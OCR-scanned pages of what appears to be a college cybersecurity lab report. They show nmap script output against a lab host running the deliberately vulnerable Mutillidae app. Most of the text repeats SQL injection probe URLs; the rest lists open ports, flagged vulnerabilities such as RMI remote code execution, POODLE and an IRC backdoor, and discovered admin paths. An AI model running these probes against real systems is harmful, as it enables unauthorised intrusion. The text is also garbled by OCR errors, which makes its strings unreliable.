http://192.168.43.120:80/dav/?C=M%3b0%3dA%27%200R%20sqlspider

10
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
http://192.168.43.120:80/dav/?C=S%3b0%3dA%27%200R%20sqlspider
http://192.168.43.120:80/dav/?C=D%3b0%3dD%27%200R%20sqlspider
http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%200R%20sqlspider
http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%200R%20sqlspider
http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqls
pider
I http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page= htmlS-storage.php%27%20OR %20sqlspider
I http://192.168.43.120:80/mutillidae/?page=credits.php%27%200R%20sqlspider
I http://192. l68.43.120:80/mutillidae/?page=show-log.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=login.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%200R
%20sqlspider
1
I http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%200R%20sqlspider
1 http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-
over-Virtual-Box-network.php%27%20OR%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page= browser-info. php%27%20OR%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sq
lspider
I http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sql
spider
I http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%200R%20sql
spider
1 http://192. l68.43. l20:80/mutillidae/index.php?page=source-viewer.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%200R%20sqlspider
1
I http://192.168.43.l20:80/mutillidae/index.php?page=password-generator.php%27%200R%20sqls
pider&userna me=anonymous
1 http://192. l68.43. l20:80/mutillidae/index.php?page=framing.php%27%200R%20sqlspider
1
I http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%
20sqlspider
1 http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%200R%20sqlspider
1
I http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspid
er
I http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=user-info.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%200R%20sqlspider
I http://192.168.43 .120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR %20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%2
0OR%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%200R%20sqls
pider
I http://192. l68.43. l20:80/mutillidae/index.php?page=user-poll.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=credits.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=show-log.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=login.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%200R%20sqlspider

11
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
I http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%200R
%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%200R%20sqlspider
1
1 http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-
over-Virtual-Box-network.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page= browser-info. php%27%20OR%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sq
lspider
I http:f /192.168.43.120:80/mutillidae/index. php?page=show-log.php%27%20OR%20sqlspider
1
1 http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%200R%20sql
spider
1 http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%200R%20sqlspider
1
I http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%200R%20sqls
pider&userna me=anonymous
1
I http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%200R%20sqlspider
1 http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%200R%
20sqlspider
1 http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%200R%20sqlspider
1
I http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%200R%20sqlspid
er
I http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%200R%20sqlspider
11 http://192.168.43.120:80/mutillidae/?page=user-info.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%200R%20sql
spider
I http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%200R%20sqlspider
11 http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%2
0OR%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%200R%20sqls
pider
I http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=htmlS-storage.php%27%20OR%20sqlspider
I http://192.168.43.l20:80/mutillidae/?page=credits.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=login.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%200R
%20sqlspider
I http://192. l68.43. l20:80/mutillidae/index.php?page=user-info.php%27%200R%20sqlspider
1
1 http://192.168.43.l20:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-
over-Virtual-Box-network.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%200R%20sqlspider
I http://192. l68.43. l20:80/mutillidae/?page=text-file-viewer.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sq
lspider
I http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sql
spider
I http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sql
spider

12
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
T http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspid
er
I http://192. l68.43.l20:80/mutillidae/index.php?page=password-generator.php%27%200R%20sqls
pider&userna me=anonymous
1 http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=show-log.php%27%200R%20sqlspider
1
I http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%200R%
20sqlspider
I http:f /192.168.43.120:80/mutillidae/index. php?page=capture-data.php%27%20OR%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%200R%20sqlspider
I http://192. l68.43.120:80/mutillidae/index.php?page=show-log.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=user-info.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%200R%20sqlspider
I http://192.168.43 .120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR %20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%2
0OR%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%200R%20sqlspider
I http:f /192.168.43.120:80/mutillidae/index. php?page=register.php%27%20OR%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%200R%20sqls
pider
I http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=credits.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=show-log.php%27%200R%20sqlspider
I http://192. l68.43. l20:80/mutillidae/index.php?page=credits.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=login.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%200R%20sqlspider&page=pe n-test-
tool-lookup.php
11 http://192. l68.43. l20:80/mutillidae/index.php?page=user-info.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-
over-Virtual-Box-network.php%27%20OR %20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%200R%20sqlspider
I http://192.168.43.l20:80/mutillidae/index.php?page=login.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sq
lspider
I http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%200R%20sqlspider&page
=pen-test-tool-lookup.php
I http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%200R%20sql
spider
I http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%200R%20sqlspid
er
I http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%200R%20sqlspider
1
1 http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%200R%20sqls
pider&userna me=anonymous
1 http://192. l68.43. l20:80/mutillidae/index.php?page=framing.php%27%200R%20sqlspider
1
I http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%200R%
20sqlspider
1 http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%200R%20sqlspider
1
I http:f /192.168.43.120:80/mutillidae/index. php?page=secret-administrative-pages.php%27%20OR
%20sqlspider
LI http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%200R%20sqlspider

13
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=user-info.php%27%200R%20sqlspider
I http://192.168.43 .120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR %20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%200R%20sql
spider
I http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%2
0OR%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqls
pider
I http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=credits.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=show-log.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%200R%20sqlspider
I http://192. l68.43. l20:80/mutillidae/?page=login.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%200R
%20sqlspider
1
I http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%200R%20sqlspider
1 http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow -to-access-Mutillidae-
over-Virtual-Box-network.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sq
lspider
I http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%200R%20sql
spider
I http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%200R%20sqlspid
er
I http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%200R%20sqls
pider&userna me=anonymous
I http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%200R%20sqlspider
1
1 http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%200R%20sql
spider
I http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%200R%
20sqlspider
I http:f /192.168.43.120:80/mutillidae/index. php?page=capture-data.php%27%20OR%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%200R%20sqlspider
I http://192.l68.43.l20:80/mutillidae/index.php?page=installation.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%200R%20sqlspider
I http://192.168.43.l20:80/mutillidae/?page=user-info.php%27%200R%20sqlspider
I http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%200R%20sqlspider
I http://192.168.43 .120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
I http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%2
0OR%20sqlspider
I Possible sqli for forms:
I Form at path: /mutillidae/index.php, form's action: index.php. Fields that might be vulnerable:
I choice
I choice
I choice
I choice
I choice

14
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
I choice
I choice
I choice
I choice
I choice
I choice
I choice
I_ initials
l_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
l_http-trace: TRACE is enabled
l_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
I rmi-vuln-classloader:
I VULNERABLE:
I RMI registry default configuration remote code execution vulnerability
I State: VULNERABLE
I Default configuration of RMI registry allows loading classes from remote URLs which can lead to
remote code execution.
I
1 References:
1 I_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rm
i_server.rb
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
l_ssl-ccs-injection: No reply from server (TIMEOUT)
1
l_sslv2-drown:
5432/tcp open postgresql
ssl-ccs-injection:
VULNERABLE:
SSL/TLS MITM vulnerability (CCS Injection)
State: VULNERABLE
Risk factor: High
OpenSSL before 0.9.Sza, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.lh
does not properly restrict processing of ChangeCipherSpec messages,
which allows man-in-the-middle attackers to trigger use of a zero
length master key in certain OpenSSL-to-OpenSSL communications, and
consequently hijack sessions or obtain sensitive information, via
a crafted TLS handshake, aka the "CCS Injection" vulnerability.

References:
http://www.openssl.org/news/secadv_20140605.txt
http://www.cvedetails.com/cve/2014-0224
I_ https://eve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
I ssl-dh-params:
I VULNERABLE:
I Diffie-Hellman Key Exchange Insufficient Group Strength
I State: VULNERABLE
I Transport Layer Security (TLS) services that use Diffie-Hellman groups
I of insufficient strength, especially those using one of a few commonly
I shared groups, may be susceptible to passive eavesdropping attacks.
I Check results:
I WEAK DH GROUP 1

15
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
Modulus Type: Safe prime
Modulus Source: Unknown/Custom-generated
Modulus Length: 1024
Generator Length: 8
Public Key Length: 1024
References:
_ https://weakdh.org
ssl-poodle:
VULNERABLE:
SSL POODLE information leak
State: VULNERABLE
IDs: BID:70574 CVE:CVE-2014-3566
The SSL protocol 3.0, as used in OpenSSL through 1.0.li and other
products, uses nondeterministic CBC padding, which makes it easier
for man-in-the-middle attackers to obtain cleartext data via a
padding-oracle attack, aka the "POODLE" issue.
Disclosure date: 2014-10-14
Check results:
TLS_RSA_WITH_AES_128_CBC_SHA
References:
https://www .securityfocus.com/bid/70574
https://www .openssl.org/ ~bodo/ssl-poodle.pdf
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
I_ https://www.imperialviolet.org/2014/10/14/poodle.html
l_sslv2-drown:
5900/tcp open vnc
l_sslv2-drown:
6000/tcp open Xl 1
6667/tcp open ire
Urc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosur
e/2010/Jun/277
8009/tcp open ajp13
8180/tcp open unknown
http-cookie-flags:
/admin/:
JSESSIONID:
httponly flag not set
/admin/index.html:
JSESSIONID:
httponly flag not set
/admin/login.html:
JSESSIONID:
httponly flag not set
/admin/admin.html:
JSESSIONID:
httponly flag not set
/admin/account.html:
JSESSIONID:
httponly flag not set
/admin/admin_login.html:
JSESSIONID:
httponly flag not set
/admin/home.html:
JSESSIONID:
httponly flag not set
/admin/admin-login.html:
JSESSIONID:
httponly flag not set
/admin/adminLogin.html:

16
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
JSESSIONID:
httponly flag not set
/admin/controlpanel.html:
JSESSIONID:
httponly flag not set
/admin/cp.html:
JSESSIONID:
httponly flag not set
/ admin/index. jsp:
JSESSIONID:
httponly flag not set
/admin/login.jsp:
JSESSIONID:
httponly flag not set
/admin/admin.jsp:
JSESSIONID:
httponly flag not set
/admin/home.jsp:
JSESSIONID:
httponly flag not set
/admin/controlpanel.jsp:
JSESSIONID:
httponly flag not set
/admin/admin-login.jsp:
JSESSIONID:
httponly flag not set
/admin/cp.jsp:
JSESSIONID:
httponly flag not set
/ admin/account.jsp:
JSESSIONID:
httponly flag not set
/admin/admin_login.jsp:
JSESSIONID:
httponly flag not set
/admin/adminlogin.jsp:
JSESSIONID:
httponly flag not set
/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html:
JSESSIONID:
httponly flag not set
/admin/includes/FCKeditor/editor/filemanager/upload/test.html:
JSESSIONID:
httponly flag not set
/admin/jscript/upload.html:
JSESSIONID:
_ httponly flag not set
http-enum:
/admin/: Possible admin folder
/admin/index.html: Possible admin folder
/admin/login.html: Possible admin folder
/admin/admin.html: Possible admin folder
/admin/account.html: Possible admin folder
/admin/admin_login.html: Possible admin folder
/admin/home.html: Possible admin folder
/admin/admin-login.html: Possible admin folder
/admin/adminlogin.html: Possible admin folder
/admin/controlpanel.html: Possible admin folder
/admin/cp.html: Possible admin folder
/admin/index.jsp: Possible admin folder

17
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
/admin/login.jsp: Possible admin folder
/admin/admin.jsp: Possible admin folder
/admin/home.jsp: Possible admin folder
/admin/controlpanel.jsp: Possible admin folder
/admin/admin-login.jsp: Possible admin folder
/admin/cp.jsp: Possible admin folder
/admin/account.jsp: Possible admin folder
/admin/admin_login.jsp: Possible admin folder
/admin/adminLogin.jsp: Possible admin folder
/manager/html/upload: Apache Tomcat (401 Unauthorized)
/manager/html: Apache Tomcat (401 Unauthorized)
/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File u
plead
